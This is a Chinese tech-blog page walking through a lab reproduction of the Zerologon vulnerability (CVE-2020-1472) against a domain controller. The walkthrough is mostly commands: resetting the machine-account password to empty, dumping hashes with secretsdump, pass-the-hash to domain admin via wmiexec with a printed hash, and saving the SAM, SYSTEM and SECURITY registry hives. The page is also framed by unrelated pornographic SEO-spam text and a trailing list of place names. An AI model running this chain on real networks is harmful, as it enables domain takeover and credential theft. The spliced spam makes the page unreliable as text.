91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何實現CVE-2020-1472 漏洞復現

發布時間:2021-12-29 15:54:00 來源:億速云 閱讀:105 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何實現CVE-2020-1472 漏洞復現,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

下面僅做漏洞復現記錄與實現,利用流程如下:

1.復現環境

win7跳板機IP:192.168.52.143

win2008域控IP: 192.168.52.138

2. 利用過程

檢測域控是否存在漏洞

python zerologon_tester.py owa 192.168.52.138

如何實現CVE-2020-1472 漏洞復現

使用漏洞利用工具將域控機器賬戶密碼置空,該步驟可能會導致域控脫域,需要及時恢復hash

python set_empty_pw.py owa 192.168.52.138

如何實現CVE-2020-1472 漏洞復現

之后使用空密碼將域控的hash下載

python secretsdump.py god.org/"owa$"@192.168.52.138 -no-pass

如何實現CVE-2020-1472 漏洞復現

之后使用hash通過wmiexec.py獲取域管權限

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:81be2f80d568100549beac645d6a7141 administrator@192.168.52.138

如何實現CVE-2020-1472 漏洞復現

執行以下命令,獲取目標原始hash

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

如何實現CVE-2020-1472 漏洞復現

將其下載下來

get system.save

get sam.save

get security.save

之后將獲取其置空前hash

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

如何實現CVE-2020-1472 漏洞復現

恢復域控hash

python reinstall_original_pw.py owa 192.168.52.138 75c1f14a63ee00aef8a5200eeff2bf88

如何實現CVE-2020-1472 漏洞復現

使用空密碼驗證連接

如何實現CVE-2020-1472 漏洞復現

域控hash已經恢復

以上就是如何實現CVE-2020-1472 漏洞復現,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

神木县| 泰宁县| 凌海市| 和林格尔县| 武平县| 鞍山市| 竹北市| 铜梁县| 上虞市| 方山县| 墨竹工卡县| 乌鲁木齐县| 彭山县| 嫩江县| 达州市| 两当县| 历史| 新巴尔虎左旗| 武清区| 长海县| 浑源县| 宣武区| 额敏县| 堆龙德庆县| 迁西县| 龙里县| 边坝县| 齐河县| 胶州市| 余姚市| 沁源县| 百色市| 黄浦区| 康马县| 木兰县| 泊头市| 高台县| 镇平县| 历史| 垦利县| 新河县|